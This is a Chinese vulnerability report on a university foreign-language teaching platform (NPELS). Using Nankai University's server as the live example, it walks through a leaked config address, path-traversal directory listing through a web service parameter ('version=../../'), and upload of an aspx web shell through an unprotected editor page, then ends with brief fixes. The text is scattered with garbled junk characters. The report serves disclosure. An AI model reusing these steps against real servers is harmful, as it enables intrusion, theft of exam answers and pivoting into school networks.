新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
( n: s7 {5 k2 ~% N" ^; R- B
详细说明：

以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
2 p: h+ O* j, N3 r7 L1 C<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
  G% K# i" Z; |) g0 o及版本号
; a9 o0 G8 L. i( o; V2 d<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
  ?  ?/ f& A% X0 \" d6 lhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
2 H0 A7 A- P/ a- s进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
0 Z- E+ p( z8 G6 a# f- Y9 E  T
发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

: j# k; |8 f0 d- s# }/ v* ]OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
+ Y% \. \/ m8 d. Z" l漏洞证明：

列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
" \; z( K" a. \  k' S/ }http://222.30.60.3/npelsv/editor/editor.htm
* X3 f! z6 X1 p+ D* e( {
( Y9 l  V' F0 U! r  d上传木马：
) R5 w8 q1 ?8 s# F! lhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
! m5 F3 E& R" n
修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​